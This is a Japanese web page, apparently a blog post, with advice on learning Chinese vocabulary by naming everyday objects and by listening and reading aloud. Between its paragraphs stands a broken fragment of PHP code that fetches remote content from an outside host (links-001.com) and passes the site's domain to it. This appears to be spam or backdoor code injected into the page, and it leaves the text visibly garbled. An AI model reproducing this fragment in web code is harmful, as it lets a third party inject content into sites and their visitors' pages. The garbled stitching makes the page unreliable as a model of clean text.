前へ
次へ

どうやって中国語を学習すると良いか

中国語を習得するためには、単語も覚える必要があります。英語にしても、単語暗記は必須でしょう。そもそも日本語を習得するためにも、どうしても単語は記憶しなければなりません。漢字などを理解していなければ、日本語を習得できないでしょう。中国語も、基本的には漢字で表記されています。この言語を習得するためには、やはり漢字も覚える必要はあります。では具体的にどうすれば単語を習得できるかというと、日常的によく見かける物を単語で表現してみる方法があります。例えば書籍などの物品は、毎日よく見かけるでしょう。その他にも標識や食品など、日常的に頻繁に見かける物は沢山あります。目に飛び込んできた物は、次から次へと中国の言語で表現してみるやり方もある訳です。日常的に頻繁に見かける物だけに、かなり実用的な単語を覚える事ができます。例えば「りんご」を見かけた時は、直ちに中国の単語で表現してみる訳です。もちろん辞書などを使用しても構いません。その作業をコツコツと続けていけば、自然と中国の単語を学習する事ができます。多少時間はかかりますが、実用的な単語や表現を覚えたい時は、一度試してみると良いでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

また単語を学習したい時は、音声を活用するのがおすすめです。未知の単語を辞書で調べるだけでなく、自分なりに声に出してみるやり方もあります。音声情報を加えてみるだけで、かなり記憶効率も良くなる傾向があります。黙読だけで単語を習得するのは、どうしても限界があるからです。それよりも自分で音読してみたり、リスニングCDなどを聞いてみれば、かなり学習効率が良くなるケースも多いです。ある意味、鼻歌に似ています。毎日耳で聞いている音楽は、自然と鼻から出てくる事もよくあります。それと同じく、中国語の単語を毎日聞き続けていれば、自然と口から出てくるケースも多いです。黙読だけでなく、音声も交えて学習を続ける方が、スピーディーに言語を習得できる傾向があります。

Page Top